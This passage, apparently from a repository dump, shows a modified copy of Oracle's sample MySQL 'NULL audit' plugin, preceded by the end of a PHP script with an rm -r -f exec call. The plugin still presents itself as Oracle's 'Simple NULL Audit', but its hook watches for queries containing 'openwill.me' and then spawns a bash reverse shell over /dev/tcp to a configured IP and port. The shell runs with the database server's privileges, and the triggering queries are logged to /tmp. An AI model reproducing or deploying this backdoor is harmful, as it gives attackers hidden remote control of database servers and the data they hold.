"; 164 | 165 | } 166 | 167 | if($remove_gzip_file=="yes"){ 168 | exec("rm -r -f $filename2"); 169 | } 170 | ?> -------------------------------------------------------------------------------- /Mysql/mysql_audit_plugin/audit_null.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Modified by t57root@gmail.com 3 | * openwill.me / www.hackshell.net 4 | */ 5 | /* Copyright (c) 2010, Oracle and/or its affiliates. All rights reserved. 6 | 7 | This program is free software; you can redistribute it and/or 8 | modify it under the terms of the GNU General Public License as 9 | published by the Free Software Foundation; version 2 of the 10 | License. 11 | 12 | This program is distributed in the hope that it will be useful, 13 | but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | GNU General Public License for more details. 16 | 17 | You should have received a copy of the GNU General Public License 18 | along with this program; if not, write to the Free Software 19 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | 30 | #define BACK_IP "127.0.0.1" 31 | #define BACK_PORT "8080" 32 | #define DEBUG 1 33 | 34 | #if !defined(__attribute__) && (defined(__cplusplus) || !defined(__GNUC__) || __GNUC__ == 2 && __GNUC_MINOR__ < 8) 35 | #define __attribute__(A) 36 | #endif 37 | static FILE *log_fp; 38 | static sem_t *sem = NULL; 39 | static time_t last_exec; 40 | 41 | static volatile int number_of_calls; /* for SHOW STATUS, see below */ 42 | /* Count MYSQL_AUDIT_GENERAL_CLASS event instances */ 43 | static volatile int number_of_calls_general_log; 44 | static volatile int number_of_calls_general_error; 45 | static volatile int number_of_calls_general_result; 46 | static volatile int number_of_calls_general_status; 47 
| /* Count MYSQL_AUDIT_CONNECTION_CLASS event instances */ 48 | static volatile int number_of_calls_connection_connect; 49 | static volatile int number_of_calls_connection_disconnect; 50 | static volatile int number_of_calls_connection_change_user; 51 | 52 | 53 | /* 54 | Initialize the plugin at server start or plugin installation. 55 | 56 | SYNOPSIS 57 | audit_null_plugin_init() 58 | 59 | DESCRIPTION 60 | Resets every call counter to zero and clears the log_fp and sem handles. 61 | 62 | RETURN VALUE 63 | 0 success 64 | 1 failure (cannot happen) 65 | */ 66 | 67 | static int audit_null_plugin_init(void *arg __attribute__((unused))) 68 | { 69 | number_of_calls= 0; 70 | number_of_calls_general_log= 0; 71 | number_of_calls_general_error= 0; 72 | number_of_calls_general_result= 0; 73 | number_of_calls_general_status= 0; 74 | number_of_calls_connection_connect= 0; 75 | number_of_calls_connection_disconnect= 0; 76 | number_of_calls_connection_change_user= 0; 77 | log_fp = NULL; 78 | sem = NULL; 79 | return(0); 80 | } 81 | 82 | 83 | /* 84 | Terminate the plugin at server shutdown or plugin deinstallation. 85 | 86 | SYNOPSIS 87 | audit_null_plugin_deinit() 88 | Closes the debug log file and the semaphore handle if they were opened. 
89 | 90 | RETURN VALUE 91 | 0 success 92 | 1 failure (cannot happen) 93 | 94 | */ 95 | 96 | static int audit_null_plugin_deinit(void *arg __attribute__((unused))) 97 | { 98 | if(log_fp!=NULL) fclose(log_fp); 99 | if(sem!=NULL) sem_close(sem); 100 | return(0); 101 | } 102 | 103 | 104 | /* 105 | Audit event hook; despite the "null" name this is not a no-op. 106 | 107 | SYNOPSIS 108 | audit_null_notify() 109 | thd connection context 110 | 111 | DESCRIPTION 112 | Counts every event. For a general-class event with a non-empty query it opens the named semaphore "haha"; if the query text contains "openwill.me", sem_trywait() succeeds and more than 10 seconds have passed since last_exec, it appends the query to /tmp/null_audit.log (only when DEBUG is defined) and calls system() to start a background bash whose stdin, stdout and stderr are a TCP connection to BACK_IP:BACK_PORT. The semaphore name is unlinked afterwards. NOTE(review): the child presumably runs with the privileges of the MySQL server process; the semaphore name, the log path and a database server spawning a shell are the observable artefacts of this plugin. */ 113 | 114 | static void audit_null_notify(MYSQL_THD thd __attribute__((unused)), 115 | unsigned int event_class, 116 | const void *event) 117 | { 118 | /* prone to races, oh well */ 119 | number_of_calls++; 120 | if (event_class == MYSQL_AUDIT_GENERAL_CLASS) 121 | { 122 | const struct mysql_event_general *pEvent; 123 | 124 | pEvent = (const struct mysql_event_general *) event; 125 | if (pEvent->general_query != NULL && *(pEvent->general_query) != '\0') { 126 | sem = sem_open("haha", O_RDWR|O_CREAT, 00777, 1); 127 | if(strstr(pEvent->general_query,"openwill.me")!=NULL && sem_trywait(sem)==0 && (time(0)-last_exec)>10){ 128 | last_exec = time(0); 129 | #ifdef DEBUG 130 | if(log_fp == NULL)log_fp = fopen("/tmp/null_audit.log", "a"); 131 | fprintf(log_fp, "execing\n"); 132 | fprintf(log_fp, "%s;\n\n", pEvent->general_query); 133 | fflush(log_fp); 134 | #endif 135 | system("bash < /dev/tcp/"BACK_IP"/"BACK_PORT" >&0 2>&0 &"); 136 | } 137 | sem_unlink("haha"); 138 | } 139 | //Job done 140 | } 141 | } 142 | 143 | 144 | /* 145 | Plugin type-specific descriptor: registers audit_null_notify for the general and connection event classes. 146 | */ 147 | 148 | static struct st_mysql_audit audit_null_descriptor= 149 | { 150 | MYSQL_AUDIT_INTERFACE_VERSION, /* interface version */ 151 | NULL, /* release_thd function */ 152 | audit_null_notify, /* notify function */ 153 | { (unsigned long) MYSQL_AUDIT_GENERAL_CLASSMASK | 154 | MYSQL_AUDIT_CONNECTION_CLASSMASK } /* class mask */ 155 | }; 156 | 157 | /* 158 | Plugin status variables for SHOW STATUS 159 | */ 160 | 161 | static struct st_mysql_show_var simple_status[]= 162 | { 163 | { "Audit_null_called", 164 |
(char *) &number_of_calls, 165 | SHOW_INT }, 166 | { "Audit_null_general_log", 167 | (char *) &number_of_calls_general_log, 168 | SHOW_INT }, 169 | { "Audit_null_general_error", 170 | (char *) &number_of_calls_general_error, 171 | SHOW_INT }, 172 | { "Audit_null_general_result", 173 | (char *) &number_of_calls_general_result, 174 | SHOW_INT }, 175 | { "Audit_null_general_status", 176 | (char *) &number_of_calls_general_status, 177 | SHOW_INT }, 178 | { "Audit_null_connection_connect", 179 | (char *) &number_of_calls_connection_connect, 180 | SHOW_INT }, 181 | { "Audit_null_connection_disconnect", 182 | (char *) &number_of_calls_connection_disconnect, 183 | SHOW_INT }, 184 | { "Audit_null_connection_change_user", 185 | (char *) &number_of_calls_connection_change_user, 186 | SHOW_INT }, 187 | { 0, 0, 0} 188 | }; 189 | 190 | 191 | /* 192 | Plugin library descriptor 193 | */ 194 | 195 | mysql_declare_plugin(audit_null) 196 | { 197 | MYSQL_AUDIT_PLUGIN, /* type */ 198 | &audit_null_descriptor, /* descriptor */ 199 | "NULL_AUDIT", /* name */ 200 | "Oracle Corp", /* author */ 201 | "Simple NULL Audit", /* description */ 202 | PLUGIN_LICENSE_GPL, 203 | audit_null_plugin_init, /* init function (when loaded) */ 204 | audit_null_plugin_deinit, /* deinit function (when unloaded) */ 205 | 0x0003, /* version */ 206 | simple_status, /* status variables */ 207 | NULL, /* system variables */ 208 | NULL, 209 | 0, 210 | } 211 | mysql_declare_plugin_end; 212 | 213 | --------------------------------------------------------------------------------